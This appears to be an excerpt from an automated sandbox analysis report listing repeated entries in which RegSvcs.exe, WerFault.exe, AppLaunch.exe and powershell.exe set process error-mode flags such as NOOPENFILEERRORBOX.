                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
